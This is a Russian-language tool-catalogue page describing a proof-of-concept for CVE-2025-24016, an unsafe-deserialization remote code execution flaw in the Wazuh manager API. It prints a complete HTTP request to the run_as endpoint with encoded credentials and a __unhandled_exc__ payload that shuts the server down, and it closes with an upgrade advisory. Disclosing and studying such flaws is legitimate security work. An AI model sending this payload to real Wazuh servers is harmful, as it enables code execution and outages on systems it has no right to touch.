Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE в сервере Wazuh! Удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/muhammadwaseem29/cve-2025-24016
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubmuhammadwaseem29/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE в сервере Wazuh! Удаленное выполнение кода

Репозиторий
521 год назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Удаленное выполнение кода (RCE) в Wazuh - PoC

Обзор уязвимости

Этот репозиторий демонстрирует уязвимость удаленного выполнения кода (RCE) на сервере Wazuh, вызванную небезопасной десериализацией в пакете wazuh-manager. Уязвимость позволяет удаленным злоумышленникам с доступом к API (скомпрометированная панель управления, серверы Wazuh в кластере или определенные конфигурации с скомпрометированными агентами) выполнять произвольный код на сервере.

Затронутые версии

  • wazuh-manager версия >= 4.4.0
  • Исправлено в версии >= 4.9.1

Описание

Уязвимость возникает в API Wazuh, где параметры в DistributedAPI сериализуются как JSON и десериализуются с помощью as_wazuh_object в файле . Злоумышленник может воспользоваться этой уязвимостью, внедрив неочищенный словарь в запросы DAPI, что может привести к выполнению произвольного кода Python.

framework/wazuh/core/cluster/common.py

RCE может быть вызвано с помощью конечной точки run_as, которая позволяет злоумышленнику контролировать аргумент auth_context. Создав вредоносный запрос, можно выполнить произвольный код на главном сервере.

Доказательство концепции

Чтобы вызвать эту уязвимость с помощью API сервера, выполните следующие шаги.

Запрос PoC в Burp Suite

  1. Запрос Burp Suite для запуска уязвимости:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Solution Image

  1. Объяснение запроса:
  • Заголовок Authorization: Это авторизация в кодировке base64 (wazuh-wui:MyS3cr37P450r.*-).
  • Полезная нагрузка: Вредоносная полезная нагрузка содержит неочищенное исключение __unhandled_exc__, которое запускает выполнение произвольного кода Python (в данном случае exit).

Воздействие

  • Удаленное выполнение кода (RCE): Эта уязвимость позволяет злоумышленникам выполнять произвольный код на сервере Wazuh, затрагивая версии с >= 4.4.0 до 4.9.0 (еще не исправлена).
  • Потенциальный отказ в обслуживании: В этом PoC вызывается функция exit, что приводит к отключению сервера Wazuh.

Смягчение последствий

Чтобы защитить свои системы, обновитесь до версии Wazuh >= 4.9.1, в которой эта проблема исправлена.

Скачать инструмент